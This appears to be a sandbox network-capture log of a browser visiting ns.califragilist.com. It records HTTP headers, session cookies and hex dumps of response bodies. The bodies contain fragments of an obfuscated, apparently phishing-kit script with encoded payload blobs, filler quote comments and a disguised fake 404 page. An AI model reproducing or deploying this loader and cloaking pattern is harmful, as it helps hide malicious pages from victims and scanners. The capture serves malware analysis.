                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjJaYUtuem1IWVZsTCtNTzU4QzJKWXc9PSIsInZhbHVlIjoiU01IU1N3ZFBvdkhuYlVnaHVDL2MzeG16VEk5RUtJS0ZFWWhIOW5GcnFOS2J1dHpvTHJ4S1R4YUo1OFN5aHZhTXl6VytzWjVCWlJORGg0RDNsNlMxdm9TQ1VGcXFVMUxhRUFwUkc3VmN2VWtMMGQxbTBsZjNWbm5kT2dkMkI0alIiLCJtYWMiOiJjYWY5NzNjYmQwYmQ0ZTRhMTRjYTljYTZlNjFjZGQ2MGUwZTVmYzFkYTBhZmFmMzc4YzU4NzBhZTg4NTgwMGQ4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikljd0h3aUgwNUk1K0pkNUZKWnZKQkE9PSIsInZhbHVlIjoiaEw5Q1NMUEQ0cEIvZDJVbUd6RFliSTBHanJ2aTV1WTIza2pVckRxMnlwS0c5Z01SR2dMaTZJdVREYXJhZ2Npb2lQZ3dGMURleXZMMzZaVSszdjBXZk5IVERKRXArZWVUYTEwNnBJTWh0cytTQ1VvRmI3K2hOKytKN1dvYXdyS24iLCJtYWMiOiI4NTUyODc1MGVmMzBjOTM5NGQ1NTNjNGQwMDNiOGZiYjY0ZjZkNjU0NDZjNDEyZDViOTQxZWRhMmYyNDA4ZGQzIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:55 UTC1214INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:55 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gt6e2WhEjpxeUD3WpOPONg5r5KabAgbgAhCRUaq9b7B2t29kcJlv4%2FXFZ0z0CWV8p8qSIKxGuaf9amSbEfrFlFhkIeO9CdV7nhM7A%2B0Vm2GXQMQYBogU8tJCL8iZ5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3395&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2364&delivery_rate=850763&cwnd=250&unsent_bytes=0&cid=7e13edcc1c58445e&ts=115&x=0"
                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6Ilh6REFqa3hnYWhIMG1WVUIvTHlIQmc9PSIsInZhbHVlIjoiMWFiRWhZd0x2anRldUpIaTYySXNYazlGN3VBTjFjMk1nZm1NWm91M0s4TkVOOFNPMXk3dlU0MUM0WDdEUFpiUVkrUVA3aDJ0WTB3ZDB5b1JRRlk4N2JHR0R4aUV1Nk9xWURPMXBMWkx3blZZOFhqZVBkTWlCNXVmemppNm1DQlAiLCJtYWMiOiI1MDk4MTM1OTc2ZTQ2ZTc4YzZhZjY2YzVkZTY3ODFmZDExZmYyZTJiNDBmNzE1YTJmNjZmYmI4YjMwYzc0YTUzIiwidGFnIjoiIn0%3D; expires=Wed, 06-Nov-2024 17:55:55 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                              2024-11-06 15:55:55 UTC708INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 46 6e 52 44 42 6c 5a 55 51 78 4d 58 70 56 65 44 64 69 63 6a 46 6d 4e 48 70 74 52 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 31 6c 59 62 32 67 76 56 6b 64 35 64 30 5a 53 51 79 73 79 61 47 68 73 57 6b 68 4c 61 31 5a 55 65 44 5a 57 64 33 59 33 54 31 59 33 56 53 74 76 53 32 35 4f 65 55 4a 52 65 6d 39 75 61 31 6f 76 55 57 70 44 51 6b 35 4f 62 57 6c 73 5a 79 39 52 54 6e 42 57 63 57 67 72 62 55 4e 43 4d 6b 4a 34 62 31 4a 4a 51 30 39 6a 54 6b 74 48 63 6b 52 59 63 45 52 6f 63 58 67 77 53 45 4a 56 61 30 4a 61 53 54 42 6e 4d 6e 42 45 52 32 35 30 4d 48 5a 56 65 6c 42 6c 55 6e 68 77 59 6c 64 74 4f 48 70 59 63 6a 6c 6c 55 6e 6b 76 55 32 30
                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjFnRDBlZUQxMXpVeDdicjFmNHptRmc9PSIsInZhbHVlIjoiY1lYb2gvVkd5d0ZSQysyaGhsWkhLa1ZUeDZWd3Y3T1Y3VStvS25OeUJRem9ua1ovUWpDQk5ObWlsZy9RTnBWcWgrbUNCMkJ4b1JJQ09jTktHckRYcERocXgwSEJVa0JaSTBnMnBER250MHZVelBlUnhwYldtOHpYcjllUnkvU20
                                                                                                                                              2024-11-06 15:55:55 UTC816INData Raw: 32 33 62 39 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 68 61 76 65 20 63 6c 69 6d 62 65 64 2c 20 62 75 74 20 68 6f 77 20 79 6f 75 20 6d 61 6b 65 20 61 20 70 6f 73 69 74 69 76 65 20 64 69 66 66 65 72 65 6e 63 65 20 74 6f 20 74 68 65 20 77 6f 72 6c 64 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 66 69 6e 61 6c 2c 20 66 61 69 6c 75 72 65 20 69 73 20 6e 6f 74 20 66 61 74 61 6c 3a 20 49 74 20 69 73 20 74 68 65 20 63 6f 75 72 61 67 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 74 68 61 74 20 63 6f 75 6e 74 73 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 4a 43 5a 73 4e 6d 79 49 56 66 28 6b 63 54 72 69 6f 6c 6a 62 4d 2c 20 58 74 51 53 43
                                                                                                                                              Data Ascii: 23b9... Success is not how high you have climbed, but how you make a positive difference to the world. -->... Success is not final, failure is not fatal: It is the courage to continue that counts. --><script>function JCZsNmyIVf(kcTrioljbM, XtQSC
                                                                                                                                              2024-11-06 15:55:55 UTC1369INData Raw: 45 78 30 57 47 46 6c 4c 61 44 42 31 56 32 78 7a 4a 6c 6b 57 53 7a 6f 67 4d 42 77 50 50 54 35 36 46 51 31 71 56 58 64 4f 47 56 74 72 4e 57 34 64 4b 78 70 33 50 53 63 61 43 46 77 6c 41 42 30 71 42 45 78 63 57 53 64 52 43 67 38 6c 48 33 6b 41 44 68 6f 78 54 41 30 45 4a 45 59 2f 44 52 49 52 66 6b 73 52 43 54 6b 63 4a 55 52 51 55 47 73 31 62 67 49 73 53 48 38 39 4a 78 6f 49 58 43 55 41 48 53 6f 45 52 55 45 43 58 54 49 31 4c 53 6b 77 4d 79 30 4b 4c 68 4a 72 52 46 5a 71 4f 52 45 50 4f 52 30 52 55 7a 4d 70 47 55 59 6b 48 41 30 51 4a 42 42 44 53 47 31 42 65 52 77 4f 43 58 67 52 58 32 5a 41 46 56 70 6d 43 42 39 77 45 45 55 36 44 41 73 50 43 43 41 53 42 33 6f 33 51 6d 6f 54 57 6d 5a 42 57 58 41 59 42 77 51 6b 47 79 4e 4d 46 41 73 38 61 41 55 5a 4b 77 55 6b 54 46 78
                                                                                                                                              Data Ascii: Ex0WGFlLaDB1V2xzJlkWSzogMBwPPT56FQ1qVXdOGVtrNW4dKxp3PScaCFwlAB0qBExcWSdRCg8lH3kADhoxTA0EJEY/DRIRfksRCTkcJURQUGs1bgIsSH89JxoIXCUAHSoERUECXTI1LSkwMy0KLhJrRFZqOREPOR0RUzMpGUYkHA0QJBBDSG1BeRwOCXgRX2ZAFVpmCB9wEEU6DAsPCCASB3o3QmoTWmZBWXAYBwQkGyNMFAs8aAUZKwUkTFx
                                                                                                                                              2024-11-06 15:55:55 UTC1369INData Raw: 41 30 35 44 30 38 73 4a 46 35 63 51 6e 46 6c 58 57 46 72 58 58 35 5a 44 67 6f 79 51 43 78 68 61 77 30 70 53 41 46 52 61 6b 6f 51 4b 54 56 62 66 44 56 75 48 6a 67 45 62 55 77 77 4b 51 68 74 4d 68 34 76 4f 43 45 62 54 58 52 61 53 78 45 49 4b 51 30 6b 48 31 74 5a 4e 6b 30 4b 43 44 34 42 4f 41 4a 4a 43 7a 56 4c 46 41 51 6b 47 7a 49 45 46 52 51 38 45 55 51 51 52 32 49 7a 41 77 49 4d 50 56 30 4b 48 32 51 66 4a 51 55 56 48 48 68 4b 41 52 67 36 42 7a 6b 66 42 42 45 6b 56 51 68 43 63 57 56 64 45 55 31 30 57 6c 30 57 47 53 55 61 62 55 77 48 44 44 35 62 45 41 49 6c 42 6e 38 55 43 51 74 38 47 42 63 66 4b 78 77 69 48 30 31 5a 4e 55 6f 57 42 44 68 42 64 78 64 73 63 7a 4e 58 43 68 67 6c 42 44 4a 43 44 52 59 33 45 41 45 5a 4f 41 63 6c 52 56 70 30 57 6b 56 70 59 54 64 42
                                                                                                                                              Data Ascii: A05D08sJF5cQnFlXWFrXX5ZDgoyQCxhaw0pSAFRakoQKTVbfDVuHjgEbUwwKQhtMh4vOCEbTXRaSxEIKQ0kH1tZNk0KCD4BOAJJCzVLFAQkGzIEFRQ8EUQQR2IzAwIMPV0KH2QfJQUVHHhKARg6BzkfBBEkVQhCcWVdEU10Wl0WGSUabUwHDD5bEAIlBn8UCQt8GBcfKxwiH01ZNUoWBDhBdxdsczNXChglBDJCDRY3EAEZOAclRVp0WkVpYTdB
                                                                                                                                              2024-11-06 15:55:55 UTC1369INData Raw: 38 51 4f 67 45 39 42 54 34 74 4c 68 55 57 46 67 34 36 42 44 59 50 42 46 46 2f 48 56 42 62 5a 51 39 37 54 45 59 35 64 78 46 4b 47 53 38 59 4f 77 30 43 48 48 67 58 51 56 77 49 52 7a 42 41 51 56 34 72 48 30 31 46 4f 41 30 6e 41 41 41 61 4e 52 42 4c 54 6e 30 73 65 41 74 4e 57 58 64 46 51 30 4a 6a 55 31 70 6d 51 56 6c 77 47 42 6c 6d 51 42 56 33 43 51 30 4b 4e 52 67 66 5a 6b 42 49 64 30 78 42 44 7a 46 4b 52 44 77 2b 4f 52 77 35 4d 79 73 63 62 79 46 4c 64 30 68 2f 50 53 63 61 43 46 77 6c 41 42 30 71 42 45 49 4d 47 43 52 62 44 45 4e 6c 4d 77 73 62 54 31 51 4e 45 6c 6c 55 45 54 51 67 51 6b 77 6b 65 78 42 62 55 51 6f 55 63 6c 68 52 55 41 74 5a 53 52 45 4c 52 51 31 63 54 45 42 2b 46 54 6c 41 46 6b 59 4d 44 55 77 44 45 52 55 2b 57 32 64 52 43 68 64 54 56 53 30 58 54
                                                                                                                                              Data Ascii: 8QOgE9BT4tLhUWFg46BDYPBFF/HVBbZQ97TEY5dxFKGS8YOw0CHHgXQVwIRzBAQV4rH01FOA0nAAAaNRBLTn0seAtNWXdFQ0JjU1pmQVlwGBlmQBV3CQ0KNRgfZkBId0xBDzFKRDw+ORw5MyscbyFLd0h/PScaCFwlAB0qBEIMGCRbDENlMwsbT1QNEllUETQgQkwkexBbUQoUclhRUAtZSRELRQ1cTEB+FTlAFkYMDUwDERU+W2dRChdTVS0XT
                                                                                                                                              2024-11-06 15:55:55 UTC1369INData Raw: 6f 65 73 2e 20 4b 65 65 70 20 67 6f 69 6e 67 2e 20 2a 2f 0d 0a 69 66 28 6c 52 71 75 72 6b 79 58 70 75 20 3d 3d 20 75 68 47 59 62 73 6f 56 5a 74 29 7b 0d 0a 63 6f 6e 73 74 20 56 74 44 59 6b 49 42 6f 77 62 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 6a 57 48 48 71 55 75 66 53 57 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 6a 57 48 48 71 55 75 66 53 57 2e 70 61 74 68 6e 61 6d 65 20 3d 20 6a 57 48 48 71 55 75 66 53 57 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 5a 55 56 66 65 6e 4d 74 64 69 20 3d 20 6a 57 48 48
                                                                                                                                              Data Ascii: oes. Keep going. */if(lRqurkyXpu == uhGYbsoVZt){const VtDYkIBowb = window.location.pathname.split('%23')[0].split('%3F')[0];if (jWHHqUufSW.pathname.endsWith('/')) {jWHHqUufSW.pathname = jWHHqUufSW.pathname.slice(0, -1);}const ZUVfenMtdi = jWHH
                                                                                                                                              2024-11-06 15:55:55 UTC1369INData Raw: 55 36 49 44 4d 77 63 48 67 37 49 6a 35 4f 62 33 51 67 52 6d 39 31 62 6d 51 4e 43 6a 77 76 61 44 49 2b 44 51 6f 38 63 44 35 55 61 47 55 67 63 6d 56 7a 62 33 56 79 59 32 55 67 63 6d 56 78 64 57 56 7a 64 47 56 6b 49 47 4e 76 64 57 78 6b 49 47 35 76 64 43 42 69 5a 53 42 6d 62 33 56 75 5a 43 42 76 62 69 42 30 61 47 6c 7a 49 48 4e 6c 63 6e 5a 6c 63 69 45 38 4c 33 41 2b 44 51 6f 38 4c 32 52 70 64 6a 34 38 4c 32 52 70 64 6a 34 38 5a 47 6c 32 49 48 4e 30 65 57 78 6c 50 53 4a 6a 62 32 78 76 63 6a 6f 6a 5a 6a 42 6d 4d 47 59 77 4f 79 42 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 4d 54 4a 77 65 44 74 74 59 58 4a 6e 61 57 34 36 59 58 56 30 62 7a 74 77 59 57 52 6b 61 57 35 6e 4f 6a 42 77 65 43 41 7a 4d 48 42 34 49 44 42 77 65 43 41 7a 4d 48 42 34 4f 33 42 76 63 32 6c 30 61
                                                                                                                                              Data Ascii: U6IDMwcHg7Ij5Ob3QgRm91bmQNCjwvaDI+DQo8cD5UaGUgcmVzb3VyY2UgcmVxdWVzdGVkIGNvdWxkIG5vdCBiZSBmb3VuZCBvbiB0aGlzIHNlcnZlciE8L3A+DQo8L2Rpdj48L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjojZjBmMGYwOyBmb250LXNpemU6MTJweDttYXJnaW46YXV0bztwYWRkaW5nOjBweCAzMHB4IDBweCAzMHB4O3Bvc2l0a
                                                                                                                                              2024-11-06 15:55:55 UTC1369INData Raw: 51 30 4e 44 73 67 62 57 46 79 5a 32 6c 75 4f 6a 41 37 5a 6d 39 75 64 44 6f 67 62 6d 39 79 62 57 46 73 49 44 45 30 63 48 67 76 4d 6a 42 77 65 43 42 42 63 6d 6c 68 62 43 77 67 53 47 56 73 64 6d 56 30 61 57 4e 68 4c 43 42 7a 59 57 35 7a 4c 58 4e 6c 63 6d 6c 6d 4f 79 42 6f 5a 57 6c 6e 61 48 51 36 4d 54 41 77 4a 54 73 67 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 73 69 50 67 30 4b 50 47 52 70 64 69 42 7a 64 48 6c 73 5a 54 30 69 61 47 56 70 5a 32 68 30 4f 6d 46 31 64 47 38 37 49 47 31 70 62 69 31 6f 5a 57 6c 6e 61 48 51 36 4d 54 41 77 4a 54 73 67 49 6a 34 67 49 43 41 67 49 44 78 6b 61 58 59 67 63 33 52 35 62 47 55 39 49 6e 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 67 64 32 6c 6b 64
                                                                                                                                              Data Ascii: Q0NDsgbWFyZ2luOjA7Zm9udDogbm9ybWFsIDE0cHgvMjBweCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBoZWlnaHQ6MTAwJTsgYmFja2dyb3VuZC1jb2xvcjogI2ZmZjsiPg0KPGRpdiBzdHlsZT0iaGVpZ2h0OmF1dG87IG1pbi1oZWlnaHQ6MTAwJTsgIj4gICAgIDxkaXYgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsgd2lkd
                                                                                                                                              2024-11-06 15:55:55 UTC123INData Raw: 65 43 68 69 6c 64 28 70 55 45 70 51 67 47 73 6b 53 29 3b 0d 0a 7d 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 21 2d 2d 20 54 68 65 20 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 61 6e 64 20 74 68 65 20 72 6f 61 64 20 74 6f 20 66 61 69 6c 75 72 65 20 61 72 65 20 61 6c 6d 6f 73 74 20 65 78 61 63 74 6c 79 20 74 68 65 20 73 61 6d 65 2e 20 2d 2d 3e 0d 0a
                                                                                                                                              Data Ascii: eChild(pUEpQgGskS);}}</script>... The road to success and the road to failure are almost exactly the same. -->
                                                                                                                                              2024-11-06 15:55:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              51192.168.2.1849805188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:55 UTC1454OUTPOST /xyi0aNMuJJrB8y7WGAXkiQfmja4dMwqOBavMS5zthEqgNsefw HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 6
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Accept: */*
                                                                                                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6Ilh6REFqa3hnYWhIMG1WVUIvTHlIQmc9PSIsInZhbHVlIjoiMWFiRWhZd0x2anRldUpIaTYySXNYazlGN3VBTjFjMk1nZm1NWm91M0s4TkVOOFNPMXk3dlU0MUM0WDdEUFpiUVkrUVA3aDJ0WTB3ZDB5b1JRRlk4N2JHR0R4aUV1Nk9xWURPMXBMWkx3blZZOFhqZVBkTWlCNXVmemppNm1DQlAiLCJtYWMiOiI1MDk4MTM1OTc2ZTQ2ZTc4YzZhZjY2YzVkZTY3ODFmZDExZmYyZTJiNDBmNzE1YTJmNjZmYmI4YjMwYzc0YTUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFnRDBlZUQxMXpVeDdicjFmNHptRmc9PSIsInZhbHVlIjoiY1lYb2gvVkd5d0ZSQysyaGhsWkhLa1ZUeDZWd3Y3T1Y3VStvS25OeUJRem9ua1ovUWpDQk5ObWlsZy9RTnBWcWgrbUNCMkJ4b1JJQ09jTktHckRYcERocXgwSEJVa0JaSTBnMnBER250MHZVelBlUnhwYldtOHpYcjllUnkvU20iLCJtYWMiOiI1ZGViNmE5N2Y3Mjg5NDkxZTU2MmIwMjM4MjJlYjYyYThkYjBmNWJiZGJkNjA5OTBjZWU1NmUwZDJkNTUwODg4IiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:55 UTC6OUTData Raw: 64 61 74 61 3d 58
                                                                                                                                              Data Ascii: data=X
                                                                                                                                              2024-11-06 15:55:55 UTC1218INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:55 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW4%2BQWLPFQlIQ4mBYl2nEZ89E4wdcrLr4tJkUvByGfLqhoFOzTEyhmzD%2FYEDw%2B2nHBW3onX0xoxw89dJqBrn%2B6oI4LLAhTHVtcpLCaDgiVmcBDZJDQGPEoKPmYNiLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3348&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2382&delivery_rate=861392&cwnd=251&unsent_bytes=0&cid=bd9fcb29cdf48b9a&ts=113&x=0"
                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6Ijd2QkhDZmlrS2dKUXpZTjFMV2pldmc9PSIsInZhbHVlIjoiaHJhNUIyTEtvVThkaldLM3oyTTU4M1hKUFZJV1k5bGUzdVAzZmxLUFhkSG8rOVQyZ3JLYkVTdmdxbkZ1RU04UHBvK2lXQWNxblgzMG0xT2xxL2tadEV6RzhGMWlYakxneVdOSk0vZlRncDVLY0c3dG9uZ2x2c1F5VXlwb3ZsajMiLCJtYWMiOiJlYWM3ZTMxOTBiZjMzYmM4ZTdmN2RiZjM3ZmI0YTY5ZmIyZjNhZWZiYTE4NzVlMWM3NDU0MzQwZDdhOWQ1M2NhIiwidGFnIjoiIn0%3D; expires=Wed, 06-Nov-2024 17:55:55 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                              2024-11-06 15:55:55 UTC708INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 78 48 55 31 68 49 54 46 51 33 53 6b 5a 36 62 56 4a 42 64 48 52 50 56 57 56 34 56 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 30 4a 6d 64 46 4a 58 64 30 31 45 65 47 39 71 53 6a 63 72 4d 54 6c 43 52 57 74 56 65 55 4d 30 63 6a 6c 69 55 7a 5a 52 4d 55 78 7a 4d 32 68 48 61 56 56 61 4d 46 46 45 64 47 35 68 63 47 4d 35 52 30 56 6d 52 56 64 35 61 6d 4a 4b 53 54 52 34 4d 57 56 54 62 46 51 32 52 48 4e 44 55 57 35 6f 4e 48 46 42 61 48 55 31 4f 56 52 6d 4d 6d 5a 6d 54 45 51 35 54 6d 4e 68 55 43 74 6d 54 6b 31 6e 61 30 68 6f 4d 6a 63 35 4f 56 64 79 54 45 77 78 4e 57 31 72 5a 6b 63 72 51 58 6c 52 4e 6e 68 54 54 58 56 49 61 7a 4a 52 63 48 4d
                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImxHU1hITFQ3SkZ6bVJBdHRPVWV4VlE9PSIsInZhbHVlIjoiT0JmdFJXd01EeG9qSjcrMTlCRWtVeUM0cjliUzZRMUxzM2hHaVVaMFFEdG5hcGM5R0VmRVd5amJKSTR4MWVTbFQ2RHNDUW5oNHFBaHU1OVRmMmZmTEQ5TmNhUCtmTk1na0hoMjc5OVdyTEwxNW1rZkcrQXlRNnhTTXVIazJRcHM
                                                                                                                                              2024-11-06 15:55:55 UTC359INData Raw: 31 36 30 0d 0a 7b 22 61 22 3a 22 52 59 76 74 30 34 43 76 35 53 77 34 49 69 62 42 6b 51 6a 66 5a 70 35 5c 2f 4a 32 48 62 56 79 31 38 6d 30 39 67 65 4d 67 4c 38 76 69 6d 36 78 77 4f 69 5a 45 6e 50 4f 70 69 4d 36 38 73 73 52 39 37 6d 30 7a 70 61 2b 55 41 66 46 66 32 76 34 36 6b 79 59 68 6c 76 70 34 66 32 6c 53 67 59 78 6a 51 4c 62 53 2b 7a 54 37 31 5c 2f 57 70 69 49 57 7a 42 6d 44 69 33 65 53 4c 5a 44 34 79 37 76 31 52 4b 39 5a 58 74 59 63 63 63 37 30 74 5c 2f 64 55 33 67 51 73 57 7a 48 6f 49 66 55 62 39 53 2b 61 58 47 34 55 38 4b 4c 65 44 75 74 72 4d 64 66 74 6b 56 65 49 6c 33 43 53 61 4f 45 6c 39 6c 72 2b 39 61 22 2c 22 62 22 3a 22 30 65 39 66 30 61 61 36 30 38 66 36 37 37 31 62 34 33 33 66 38 32 61 64 65 34 39 63 62 33 30 36 22 2c 22 63 22 3a 22 33 34 61
                                                                                                                                              Data Ascii: 160{"a":"RYvt04Cv5Sw4IibBkQjfZp5\/J2HbVy18m09geMgL8vim6xwOiZEnPOpiM68ssR97m0zpa+UAfFf2v46kyYhlvp4f2lSgYxjQLbS+zT71\/WpiIWzBmDi3eSLZD4y7v1RK9ZXtYccc70t\/dU3gQsWzHoIfUb9S+aXG4U8KLeDutrMdftkVeIl3CSaOEl9lr+9a","b":"0e9f0aa608f6771b433f82ade49cb306","c":"34a
                                                                                                                                              2024-11-06 15:55:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              52192.168.2.1849810188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:56 UTC1116OUTGET /xyi0aNMuJJrB8y7WGAXkiQfmja4dMwqOBavMS5zthEqgNsefw HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6Ijd2QkhDZmlrS2dKUXpZTjFMV2pldmc9PSIsInZhbHVlIjoiaHJhNUIyTEtvVThkaldLM3oyTTU4M1hKUFZJV1k5bGUzdVAzZmxLUFhkSG8rOVQyZ3JLYkVTdmdxbkZ1RU04UHBvK2lXQWNxblgzMG0xT2xxL2tadEV6RzhGMWlYakxneVdOSk0vZlRncDVLY0c3dG9uZ2x2c1F5VXlwb3ZsajMiLCJtYWMiOiJlYWM3ZTMxOTBiZjMzYmM4ZTdmN2RiZjM3ZmI0YTY5ZmIyZjNhZWZiYTE4NzVlMWM3NDU0MzQwZDdhOWQ1M2NhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxHU1hITFQ3SkZ6bVJBdHRPVWV4VlE9PSIsInZhbHVlIjoiT0JmdFJXd01EeG9qSjcrMTlCRWtVeUM0cjliUzZRMUxzM2hHaVVaMFFEdG5hcGM5R0VmRVd5amJKSTR4MWVTbFQ2RHNDUW5oNHFBaHU1OVRmMmZmTEQ5TmNhUCtmTk1na0hoMjc5OVdyTEwxNW1rZkcrQXlRNnhTTXVIazJRcHMiLCJtYWMiOiI3YWVmYzc4OGEwODFmMDZkNDc4NGRiZjlkMGJjNGQ3MjlhYWQzZjM4MGQ4YzllY2ZjMjA5MzMwODczNDRjNDMyIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:57 UTC981INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:57 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
